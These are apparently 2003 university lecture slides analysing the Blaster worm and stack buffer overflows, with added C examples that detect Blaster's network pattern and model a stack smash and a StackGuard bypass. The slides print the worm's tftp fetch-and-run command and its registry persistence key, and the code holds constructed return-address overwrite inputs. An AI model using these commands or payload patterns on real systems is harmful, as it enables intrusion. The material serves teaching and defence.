Analysis of the Internet Worm of August 2003
INFORMATION AND COMPUTER SCIENCE DEPARTMENT, Dr. K. Salah, September 2003


Agenda
Reasons for Talk
Some Jargon
Ethics of Hackers
Why Can't Our Kids Hack?
Example of Hacker Attacks
W32 Blaster Worm
Smashing the Stack for Fun and Profit
More Information

Reasons for Talk
Know Your Enemy!
– The Prophet of Islam says, "Whoever learns the language of a people is safe from their cunning." (من تعلم لغة قوم أمن مكرهم)
– "Know your enemy and know yourself and you can fight a hundred battles without disaster," Sun Tzu.
Knowledge is power!
– Understand hacker tactics, strategies, and tricks.
– Be better prepared.
– Design and write better code.
– Take countermeasures.
Know something about the ethics of hackers.
Appreciate how smart the hackers are!
Research

Some Jargon
Hoax vs. Worm vs. Virus
Trojan Horse
Crackers vs. Hackers vs. Intruders
DoS attack

The Hacker Ethic
Hackers have ethics, according to Socrates.
"The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.
– Translated into 15 languages.
– Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.
– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.
Why hacking?
– Enjoy the challenge and excitement.
– Joy, fun, ego, and recognition.
– Hate Microsoft products and practices.
– The battle with google.com has started.

Hacker Ethics
Information should be free.
– Driving Linux/Apache and open source code.
– Technology is only good if you get other people to join you in developing and using it.
Information should always be disclosed.
– Not all people can afford to buy software or information.
– No concern for copyright laws/abuses, intellectual property, passwords, data security!
Hacking is essential to show security holes and vulnerabilities.
– So many hackers are security gurus.
– A way to make a living and learn about computers.
Hackers are not doing real harm.
– Pushing technology to its knees.
– "We are just curious and inquisitive people… we want to chart new territory and look around," Craig Neidorf.
– Craig Neidorf is the founder of Phrack Magazine and a member of the 2600 club. His is

Kids and Hacking
Kids are very curious, and thus make natural hackers.
They have much more time and fewer responsibilities!
They look for recognition and fun.
Usually kids fall victim and get caught first.
The originators of the attacks are yet to be found.
What does it really take to be a hacker?
– Some knowledge of C and assembly programming.
– Some knowledge of operating systems.
– Some knowledge of networking (TCP/IP).
– (Beware!!! These are our ICS and COE students!!!)

Kids and Hacking (screenshot)

Kids and Hacking (screenshot)

Kids and Hacking
Shall we give up hope?
– The 1998 registrar incident.
So, why can't our kids hack?
– Digital divide.
– English.
– Busy and distracted…

Fun, Attacks, or Damages (screenshot)

Fun, Attacks, or Damages (screenshot)

Fun, Attacks, or Damages (screenshot, August 17, 1996)

Fun, Attacks, or Damages (screenshot, August 14, 2003)

Fun, Attacks, or Damages (screenshot, August 14, 2003)

The Blaster Worm
Affected Windows XP and Windows 2000.
Causes Windows NT machines to crash when it tries to exploit them.
Has many variants: Blaster-A, Blaster-B, … Blaster-F.
– Blaster-F was linked to a Romanian student.
This is a worm, not a virus: it spreads by itself over the network, with no host file and no user action needed.
Eats up network bandwidth.
Encouraged other hackers to release other worms: Sobig, Welchia, etc.
Microsoft called it, "A security issue has been identified…"

Technical Details
1) An infected system scans the network for any computer listening on TCP port 135 (the Windows RPC/DCOM endpoint mapper).
– TCP port 135 is used by Microsoft Active Directory and Microsoft Exchange mail servers, among other things, so it is open on a great many Windows machines.
– See "The Art of Port Scanning," published in Phrack Magazine.

Technical Details
2) The infected system attempts to exploit the RPC buffer overflow on those systems listening on TCP port 135. This is the DCOM RPC vulnerability that Microsoft had patched in bulletin MS03-026 on July 16, 2003, almost four weeks before the worm appeared.
– The buffer overflow attack will be explained later.

Technical Details
3) The buffer overflow carries shellcode which makes the victim open a cmd.exe shell listening on TCP port 4444 (the "egg"); the attacker connects to that shell and makes it "hatch":
– The victim starts a TFTP session back to the attacker (UDP port 69) to download a copy of the worm, "msblast.exe".
– The command issued through the shell is of the form: cmd /c tftp -i <attacker address> GET msblast.exe & msblast.exe & exit
– "msblast.exe" is packed with the UPX compression utility, is self-extracting, and is 11KB once unpacked.

Technical Details
4) "msblast.exe" gets executed and starts the scanning process for computers listening on TCP port 135.
– A text string in the worm code reads, "I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!"
– The code creates a mutex called "BILLY" to avoid running multiple times.
– It also adds a registry entry so that it runs on every Windows restart: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe"

Technical Details
A secondary payload in the worm is supposed to make all infected systems launch a DoS attack (a SYN flood) against Microsoft's windowsupdate.com website starting on August 16. (Microsoft blunted it by simply removing the windowsupdate.com DNS record.)
– Why August 16?
– Any relation to the DOJ hack?
If the worm cannot resolve a DNS entry for windowsupdate.com, it falls back to an address that produces broadcast traffic, flooding the local network.
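The four stages above, seen from the network, as an added detection example (not part of the slides or of any published Blaster analysis). It runs over a handful of constructed flow records in a made-up log format (source host, destination host, protocol, destination port) and flags the attacker-to-victim sequence TCP/135, then TCP/4444, then UDP/69 back to the attacker, plus the width of the TCP/135 sweep that precedes it. All host addresses are invented.

```c
#include <stdio.h>
#include <string.h>

#define PROTO_TCP 6
#define PROTO_UDP 17

/* One connection record.  The field set is an assumption for this example;
 * a real firewall or flow log carries more, but these four suffice. */
struct flow {
    const char *src;   /* source host */
    const char *dst;   /* destination host */
    int proto;         /* PROTO_TCP or PROTO_UDP */
    int dport;         /* destination port */
};

/* Constructed sample: 10.0.0.5 is already infected, sweeps TCP/135 across
 * the subnet, succeeds against 10.0.0.9, talks to the egg on 4444, and the
 * victim fetches msblast.exe over tftp.  10.0.0.7 is a normal RPC client. */
const struct flow SAMPLE[] = {
    { "10.0.0.5", "10.0.0.6",  PROTO_TCP, 135  },
    { "10.0.0.5", "10.0.0.7",  PROTO_TCP, 135  },
    { "10.0.0.5", "10.0.0.8",  PROTO_TCP, 135  },
    { "10.0.0.5", "10.0.0.9",  PROTO_TCP, 135  },
    { "10.0.0.7", "10.0.0.1",  PROTO_TCP, 135  },
    { "10.0.0.5", "10.0.0.9",  PROTO_TCP, 4444 },
    { "10.0.0.9", "10.0.0.5",  PROTO_UDP, 69   },
    { "10.0.0.9", "10.0.0.10", PROTO_TCP, 135  },  /* new victim starts scanning */
};
const size_t SAMPLE_LEN = sizeof SAMPLE / sizeof SAMPLE[0];

/* Stage reached by the attacker->victim pair, in wire order:
 *   0 nothing seen, 1 TCP/135 (RPC/DCOM exploit attempt),
 *   2 TCP/4444 (the cmd.exe egg), 3 UDP/69 from victim back to attacker
 *   (tftp fetch of msblast.exe).  Stages must occur in this order. */
int blaster_stage_reached(const struct flow *f, size_t n,
                          const char *attacker, const char *victim)
{
    int stage = 0;
    for (size_t i = 0; i < n; i++) {
        int a2v = strcmp(f[i].src, attacker) == 0 && strcmp(f[i].dst, victim) == 0;
        int v2a = strcmp(f[i].src, victim) == 0 && strcmp(f[i].dst, attacker) == 0;
        if (stage == 0 && a2v && f[i].proto == PROTO_TCP && f[i].dport == 135)
            stage = 1;
        else if (stage == 1 && a2v && f[i].proto == PROTO_TCP && f[i].dport == 4444)
            stage = 2;
        else if (stage == 2 && v2a && f[i].proto == PROTO_UDP && f[i].dport == 69)
            stage = 3;
    }
    return stage;
}

/* Number of distinct hosts `src` has probed on TCP/135.  An infected host
 * sweeps many addresses; an ordinary RPC client talks to one or two. */
int rpc_sweep_width(const struct flow *f, size_t n, const char *src)
{
    const char *seen[64];
    int count = 0;
    for (size_t i = 0; i < n; i++) {
        if (strcmp(f[i].src, src) != 0 || f[i].proto != PROTO_TCP || f[i].dport != 135)
            continue;
        int dup = 0;
        for (int j = 0; j < count; j++)
            if (strcmp(seen[j], f[i].dst) == 0) { dup = 1; break; }
        if (!dup && count < 64)
            seen[count++] = f[i].dst;
    }
    return count;
}

int main(void)
{
    printf("10.0.0.5 -> 10.0.0.9 reached stage %d\n",
           blaster_stage_reached(SAMPLE, SAMPLE_LEN, "10.0.0.5", "10.0.0.9"));
    printf("10.0.0.5 swept %d hosts on TCP/135\n",
           rpc_sweep_width(SAMPLE, SAMPLE_LEN, "10.0.0.5"));
    printf("10.0.0.7 swept %d hosts on TCP/135\n",
           rpc_sweep_width(SAMPLE, SAMPLE_LEN, "10.0.0.7"));
    return 0;
}
```

The stage check insists on wire order because a lone TCP/135 connection is everyday Windows traffic; it is the 135 then 4444 then reverse 69 chain on one host pair that is characteristic of the worm. The sweep count gives an early signal on its own, before any exploit succeeds.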

Buffer Overflow Attack
First rule of hacking: do everything you are not supposed to!
– If you can't change the flow of execution, crash it!
Started with the Robert Morris worm in 1988, exploiting a buffer overflow vulnerability in fingerd.
Code Red worm of 2001, exploiting a buffer overflow vulnerability in Microsoft IIS (Internet Information Server).
The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC.
The next attack will most likely be linked to a buffer overflow as well.
(Chart: CERT security alerts by year, up to the first two months of 2002)

Buffer Overflow Attack
The best article on the know-how details of the buffer overflow is in Phrack Magazine issue 49 (1996), titled "Smashing the Stack for Fun and Profit," by

Buffer Overflow Attack (figure)

Buffer Overflow Attack (figure)

Buffer Overflow Attack
Partial list of unsafe functions in the standard C library:

Buffer Overflow Attack Countermeasures
Validate all arguments or parameters received whenever you write a function.
– Bounds checking.
– Performance is compromised!!
Use bounded functions instead, e.g., strncpy() and strncat().
– Caveat: strncpy() does not NUL-terminate the destination when the source is at least as long as the size given, and the size passed to strncat() is the space remaining, not the total buffer size. Check the length yourself and terminate explicitly.
Use safe compilers.
– Watch out for free compilers!!! They can be made by hackers, for hackers!
Test your code thoroughly.
Keep applying patches.
A good site for advisories is CERT at Carnegie Mellon's Software Engineering Institute.
Can this attack ever be eliminated?
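An added example, not from the slides, of the attack these countermeasures defend against, beside a bounds-checked copy and the strncpy() check just mentioned. It models the x86 frame layout of the Phrack 49 article as a plain byte array, so the overflow stays inside the model and the program is well defined; the saved EBP, the return addresses and the attacker string are constructed for the demonstration. strcpy() stands in for the list of unsafe functions, which did not survive in the transcript.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Modelled x86 frame, low addresses first: 16-byte local buffer, saved
 * EBP, saved return address.  Bytes copied past the buffer run upward
 * into the control data, exactly as on the real stack. */
#define BUF_SIZE   16
#define FP_OFFSET  16
#define RET_OFFSET 20
#define FRAME_SIZE 24

struct frame { unsigned char bytes[FRAME_SIZE]; };

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff;         p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Function prologue: zero the locals, save EBP and the return address. */
void frame_init(struct frame *f, uint32_t ret)
{
    memset(f->bytes, 0, FRAME_SIZE);
    store_le32(f->bytes + FP_OFFSET, 0xbffff7f0u);   /* arbitrary saved EBP */
    store_le32(f->bytes + RET_OFFSET, ret);
}

uint32_t frame_ret(const struct frame *f) { return load_le32(f->bytes + RET_OFFSET); }

/* strcpy() semantics: copy until the source NUL, never look at the
 * destination size.  Done byte by byte so the overflow stays inside
 * `bytes`; the cap at FRAME_SIZE only keeps this model in bounds, real
 * strcpy() (like gets(), strcat() and sprintf()) has no such cap. */
void unsafe_copy(struct frame *f, const char *src)
{
    size_t i;
    for (i = 0; src[i] != '\0' && i < FRAME_SIZE; i++)
        f->bytes[i] = (unsigned char)src[i];
    if (i < FRAME_SIZE)
        f->bytes[i] = 0;
}

/* Bounds-checked replacement: the caller passes the buffer size, the
 * length is checked before any byte is written, and the result is always
 * NUL-terminated.  Returns 0 on success, -1 if the input does not fit. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len == dst_size)                 /* no room for the terminator */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* The strncpy() pitfall: with a source of dst_size or more characters it
 * fills dst completely and writes no NUL.  Returns 1 if dst is left
 * unterminated, 0 if it is a proper string. */
int strncpy_left_unterminated(char *dst, size_t dst_size, const char *src)
{
    strncpy(dst, src, dst_size);
    return memchr(dst, '\0', dst_size) == NULL;
}

/* Constructed attacker input: 20 filler bytes reach the return address,
 * then 0x12345678 in little-endian byte order (a real exploit puts the
 * address of its shellcode here). */
const char ATTACK_INPUT[] = "AAAAAAAAAAAAAAAAAAAA" "\x78\x56\x34\x12";

/* Return address after the overflow: 0x12345678 instead of the original. */
uint32_t ret_after_overflow(void)
{
    struct frame f;
    frame_init(&f, 0x08048abcu);
    unsafe_copy(&f, ATTACK_INPUT);
    return frame_ret(&f);
}

char SCRATCH[BUF_SIZE];   /* destination buffer for the hardened calls */

int main(void)
{
    printf("return address after unsafe copy: 0x%08x\n", (unsigned)ret_after_overflow());
    printf("bounded_copy of the same input: %d (refused)\n",
           bounded_copy(SCRATCH, sizeof SCRATCH, ATTACK_INPUT));
    printf("strncpy left the buffer unterminated: %d\n",
           strncpy_left_unterminated(SCRATCH, sizeof SCRATCH, ATTACK_INPUT));
    return 0;
}
```

The bounded version refuses rather than truncates: silently cutting a 24-byte input to 15 characters is safe against the overflow but can still break whatever the caller does with the string next, so returning an error the caller must handle is the more honest interface.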

Research on Protecting the Stack
A good number of references can be found at:
How?
– Splitting the control stack from the data stack.
  The control stack contains return addresses.
  The data stack contains local variables and passed parameters.
– Use middleware software (libsafe) to intercept calls to library functions known to be vulnerable.
– Using StackGuard and StackShield.
  Adds more code at the beginning and end of each function.
  StackGuard plants a "canary" word next to the return address and checks it before returning; StackShield keeps a separate copy of the return address and compares it. Either way, an altered return address signals a violation.
– Others.
– Performance overhead is always an issue!

The Adventure Continues
The fix for smashing the stack:
– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen, "Protecting Systems from Stack Smashing Attacks with StackGuard."
Bypassing the fix:
– Phrack Magazine issue 56 (May 2000): "Bypassing StackGuard and StackShield" by Bulba and Kil3r.
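An added example (not from the slides or from either cited paper) of the protection described in the previous slide and of the bypass named here, on a modelled frame of a function built with a StackGuard-style canary. The frame address, the canary value, the return addresses and both attacker strings are constructed for the demonstration. The bypass follows the idea of the Bulba and Kil3r article: overwrite a local pointer that the function later writes through, so the return address is changed without the canary ever being touched.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Frame of a function built with a StackGuard-style canary, low addresses
 * first: 16-byte buffer, a local data pointer p, saved EBP, the canary,
 * then the saved return address.  FRAME_BASE is the assumed address of
 * the frame, so that p can hold realistic pointer values. */
#define PTR_OFFSET 16
#define FP_OFFSET  20
#define CAN_OFFSET 24
#define RET_OFFSET 28
#define FRAME_SIZE 32
#define FRAME_BASE 0xbffff700u
#define CANARY     0x000aff0du   /* StackGuard's terminator canary */
#define GOOD_RET   0x08048abcu
#define EVIL_RET   0x12345678u

struct frame { unsigned char bytes[FRAME_SIZE]; };

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff;         p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Prologue: p points at the buffer, the canary is planted beside ret. */
void frame_init(struct frame *f, uint32_t ret)
{
    memset(f->bytes, 0, FRAME_SIZE);
    store_le32(f->bytes + PTR_OFFSET, FRAME_BASE);
    store_le32(f->bytes + FP_OFFSET, 0xbffff7f0u);
    store_le32(f->bytes + CAN_OFFSET, CANARY);
    store_le32(f->bytes + RET_OFFSET, ret);
}

/* strcpy()-style copy: stops at the source NUL only.  The FRAME_SIZE cap
 * exists so the model stays in bounds; real strcpy() has none. */
void unsafe_copy(struct frame *f, const char *src)
{
    size_t i;
    for (i = 0; src[i] != '\0' && i < FRAME_SIZE; i++)
        f->bytes[i] = (unsigned char)src[i];
    if (i < FRAME_SIZE)
        f->bytes[i] = 0;
}

/* The function's own later statement `*p = v`.  p is a FRAME_BASE-relative
 * address here; writes outside the frame are refused.  Returns 1 if written. */
int write_through_ptr(struct frame *f, uint32_t v)
{
    uint32_t p = load_le32(f->bytes + PTR_OFFSET);
    if (p < FRAME_BASE || p > FRAME_BASE + FRAME_SIZE - 4)
        return 0;
    store_le32(f->bytes + (p - FRAME_BASE), v);
    return 1;
}

enum outcome { INTACT = 0, CANARY_TRIPPED = 1, RET_HIJACKED = 2 };

/* Epilogue as StackGuard instruments it: verify the canary, then return. */
enum outcome classify(const struct frame *f)
{
    if (load_le32(f->bytes + CAN_OFFSET) != CANARY)   return CANARY_TRIPPED;
    if (load_le32(f->bytes + RET_OFFSET) != GOOD_RET) return RET_HIJACKED;
    return INTACT;
}

/* Constructed input 1, the straight smash of the Phrack 49 article: 24
 * filler bytes cover buf, p and saved EBP, 4 land on the canary, 4 on ret. */
const char SMASH_INPUT[] = "AAAAAAAAAAAAAAAAAAAAAAAA" "XXXX" "\x78\x56\x34\x12";

/* Constructed input 2, the Bulba and Kil3r pointer trick: 20 bytes only,
 * so just p is overwritten, with the address of the saved return address
 * (FRAME_BASE + 28 = 0xbffff71c, little-endian, no NUL bytes). */
const char BYPASS_INPUT[] = "AAAAAAAAAAAAAAAA" "\x1c\xf7\xff\xbf";

enum outcome run_straight_smash(void)
{
    struct frame f;
    frame_init(&f, GOOD_RET);
    unsafe_copy(&f, SMASH_INPUT);        /* canary destroyed on the way to ret */
    return classify(&f);
}

enum outcome run_pointer_bypass(void)
{
    struct frame f;
    frame_init(&f, GOOD_RET);
    unsafe_copy(&f, BYPASS_INPUT);       /* overwrites p, stops short of the canary */
    write_through_ptr(&f, EVIL_RET);     /* the function then does *p = v */
    return classify(&f);
}

int main(void)
{
    printf("straight smash: outcome %d (1 = canary tripped)\n", run_straight_smash());
    printf("pointer bypass: outcome %d (2 = return hijacked, canary intact)\n",
           run_pointer_bypass());
    return 0;
}
```

The canary catches the first input because a linear overwrite cannot reach the return address without passing through the canary word. The second input never gets that far: it only corrupts p, and the function's own later write through p lands on the return address directly, which is why the check in the epilogue finds nothing wrong.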

Curious about More Hacking Techniques
Compulsory reading: "Hacking Exposed"

A copy of this PPT presentation can be found at
– Under the MISC section